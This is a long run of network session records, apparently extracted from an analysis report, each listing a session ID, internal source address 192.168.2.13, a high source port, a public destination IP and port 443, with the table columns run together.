                                                21275192.168.2.1347746158.226.232.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21276192.168.2.136010065.22.228.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21277192.168.2.1342648147.110.122.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21278192.168.2.133327425.122.97.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21279192.168.2.1357318200.47.165.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21280192.168.2.134410671.41.46.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21281192.168.2.135117091.171.166.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21282192.168.2.135095838.70.75.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21283192.168.2.134985418.110.77.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21284192.168.2.134175675.5.124.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21285192.168.2.134622064.159.89.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21286192.168.2.1338858203.201.248.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21287192.168.2.1342302114.120.174.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21288192.168.2.1355064142.73.198.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21289192.168.2.1351596188.117.33.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21290192.168.2.135113487.33.232.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21291192.168.2.135419886.228.29.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21292192.168.2.133521665.147.55.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21293192.168.2.1335060105.214.26.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21294192.168.2.1346888124.177.225.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21295192.168.2.135950689.234.7.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21296192.168.2.1355926160.33.187.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21297192.168.2.1346878203.101.62.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21298192.168.2.1356498151.93.201.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21299192.168.2.1354604192.165.101.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21300192.168.2.1335214140.84.191.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21301192.168.2.1358130110.191.72.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21302192.168.2.135278095.56.122.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21303192.168.2.1345508166.169.198.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21304192.168.2.1335270174.74.1.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21305192.168.2.1337866210.223.151.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21306192.168.2.135812696.51.33.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21307192.168.2.13432585.54.20.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21308192.168.2.1350082183.4.15.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21309192.168.2.136005038.3.30.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21310192.168.2.136056020.107.4.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21311192.168.2.133375838.116.253.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21312192.168.2.135612488.215.237.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21313192.168.2.134127850.18.106.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21314192.168.2.13469384.104.224.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21315192.168.2.1348904218.129.136.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21316192.168.2.135271481.30.60.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21317192.168.2.1343684122.158.254.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21318192.168.2.1360522188.251.38.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21319192.168.2.133909280.244.18.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21320192.168.2.1347900144.71.203.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21321192.168.2.13433562.57.91.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21322192.168.2.135080052.64.141.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21323192.168.2.13371262.234.64.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21324192.168.2.1333570152.215.32.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21325192.168.2.1348590103.78.88.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21326192.168.2.1333002209.11.176.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21327192.168.2.1348356138.99.93.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21328192.168.2.1342956167.20.224.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21329192.168.2.135722857.220.168.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21330192.168.2.1347576106.167.122.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21331192.168.2.133456448.217.198.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21332192.168.2.1348978205.57.6.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21333192.168.2.1358334115.115.41.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21334192.168.2.1336938202.225.33.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21335192.168.2.1340490118.251.118.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21336192.168.2.1346030105.153.230.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21337192.168.2.1341372140.195.65.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21338192.168.2.13367244.96.129.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21339192.168.2.1351870134.195.60.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21340192.168.2.135587494.85.167.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21341192.168.2.1348358210.21.8.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21342192.168.2.1342346144.142.44.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21343192.168.2.13334709.14.24.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21344192.168.2.1352168110.36.94.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21345192.168.2.1339538184.250.162.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21346192.168.2.1339250196.27.15.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21347192.168.2.1354528222.162.234.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21348192.168.2.1345996105.52.93.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21349192.168.2.1353314177.81.85.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21350192.168.2.134640213.130.162.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21351192.168.2.134615014.97.156.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21352192.168.2.133404641.222.105.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21353192.168.2.133484818.94.68.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21354192.168.2.133983257.41.212.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21355192.168.2.134851448.2.78.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21356192.168.2.134634298.218.224.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21357192.168.2.133638089.66.104.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21358192.168.2.133276899.144.79.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21359192.168.2.1336982174.188.205.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21360192.168.2.1346124120.201.173.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21361192.168.2.133377649.94.172.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21362192.168.2.134008088.225.191.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21363192.168.2.133416658.137.38.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21364192.168.2.1354454171.222.59.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21365192.168.2.134754253.164.138.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21366192.168.2.1352542219.220.225.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21367192.168.2.1333594102.56.94.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21368192.168.2.1336794131.131.36.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21369192.168.2.1356076205.48.61.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21370192.168.2.1355814193.123.124.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21371192.168.2.135062494.61.95.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21372192.168.2.1348350102.113.69.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21373192.168.2.1345998145.222.247.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21374192.168.2.1335246150.122.149.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21375192.168.2.134510083.24.22.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21376192.168.2.133461441.182.138.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21377192.168.2.1347894168.115.101.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21378192.168.2.13457081.79.45.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21379192.168.2.1360644152.49.175.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21380192.168.2.1352194197.225.102.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21381192.168.2.1338424211.194.99.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21382192.168.2.1348800112.225.222.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21383192.168.2.1343692218.183.30.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21384192.168.2.1357780148.181.185.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21385192.168.2.1357754164.71.212.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21386192.168.2.1346312174.241.236.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21387192.168.2.1339074165.43.23.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21388192.168.2.1336132149.143.40.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21389192.168.2.135403443.113.37.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21390192.168.2.1350466110.138.250.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21391192.168.2.1337768144.196.21.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21392192.168.2.1334254138.244.125.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21393192.168.2.1359866195.104.172.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21394192.168.2.134048819.23.243.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21395192.168.2.135602612.176.243.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21396192.168.2.1356918201.207.120.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21397192.168.2.135152091.170.149.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21398192.168.2.134022897.248.213.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21399192.168.2.135874262.226.169.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21400192.168.2.134752840.248.251.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21401192.168.2.135316412.169.144.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21402192.168.2.134751877.44.233.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21403192.168.2.134581898.118.167.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21404192.168.2.1349362197.159.184.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21405192.168.2.1350424120.50.241.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21406192.168.2.1350308152.47.22.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21407192.168.2.1332960194.2.20.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21408192.168.2.1346996154.250.189.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21409192.168.2.1341592161.239.126.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21410192.168.2.135288897.251.191.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21411192.168.2.1337318176.107.14.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21412192.168.2.1342770217.216.82.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21413192.168.2.134996873.150.235.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21414192.168.2.1346276191.33.120.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21415192.168.2.135652019.71.4.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21416192.168.2.1333010191.118.15.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21417192.168.2.13380109.107.187.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21418192.168.2.1334808201.30.134.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21419192.168.2.1351860199.132.76.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21420192.168.2.1360844139.174.33.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21421192.168.2.1350396166.94.92.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21422192.168.2.134219098.189.22.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21423192.168.2.1337492108.116.127.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21424192.168.2.1356360145.83.39.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21425192.168.2.1359234148.35.141.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21426192.168.2.1345614222.144.156.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21427192.168.2.1356802136.225.39.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21428192.168.2.1341006124.88.251.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21429192.168.2.134908844.18.114.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21430192.168.2.1334442133.85.202.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21431192.168.2.135346897.144.3.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21432192.168.2.134784827.139.75.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21433192.168.2.134800842.53.53.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21434192.168.2.133905851.193.175.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21435192.168.2.1336138132.60.119.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21436192.168.2.1348408166.130.211.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21437192.168.2.1336318217.7.243.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21438192.168.2.1358242108.55.23.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21439192.168.2.1335284211.101.194.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21440192.168.2.1346026185.81.220.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21441192.168.2.133326818.253.147.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21442192.168.2.1342490189.30.50.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21443192.168.2.1340974218.51.195.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21444192.168.2.134268648.212.211.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21445192.168.2.134296232.178.241.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21446192.168.2.1356150190.153.135.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21447192.168.2.1357540124.110.250.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21448192.168.2.135180041.127.245.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21449192.168.2.1345524169.151.77.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21450192.168.2.1334878188.153.116.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21451192.168.2.134182285.229.85.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21452192.168.2.135652460.110.21.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21453192.168.2.1355038196.147.238.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21454192.168.2.135620296.118.73.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21455192.168.2.1355980211.77.183.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21456192.168.2.1342538139.92.129.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21457192.168.2.135141099.199.23.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21458192.168.2.13592342.218.201.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21459192.168.2.133727470.90.229.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21460192.168.2.13517068.23.177.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21461192.168.2.134734671.101.163.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21462192.168.2.133585078.61.17.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21463192.168.2.1346000129.254.192.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21464192.168.2.133279090.216.237.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21465192.168.2.13512429.55.70.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21466192.168.2.1341122120.224.99.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21467192.168.2.1337274117.146.252.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21468192.168.2.133339885.154.188.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21469192.168.2.133735441.4.66.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21470192.168.2.13605701.88.0.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21471192.168.2.135044693.97.11.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21472192.168.2.1347160219.58.253.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21473192.168.2.1340082139.122.227.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21474192.168.2.1349778211.124.80.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21475192.168.2.1341944192.36.207.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21476192.168.2.135255870.243.127.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21477192.168.2.135556649.164.222.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21478192.168.2.133588031.41.166.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21479192.168.2.1351630188.133.233.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21480192.168.2.1340274128.246.57.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21481192.168.2.1341042137.224.101.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21482192.168.2.134507078.220.146.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21483192.168.2.1355772124.233.208.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21484192.168.2.135726044.164.64.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21485192.168.2.1345872187.1.247.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21486192.168.2.1338828216.221.190.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21487192.168.2.134855267.240.0.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21488192.168.2.134869439.97.102.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21489192.168.2.1355878133.233.139.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21490192.168.2.133759240.244.227.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21491192.168.2.1357876194.122.12.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21492192.168.2.1334646181.67.57.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21493192.168.2.1342374178.9.182.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21494192.168.2.1354422182.41.180.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21495192.168.2.1356296177.158.122.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21496192.168.2.133573881.217.141.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
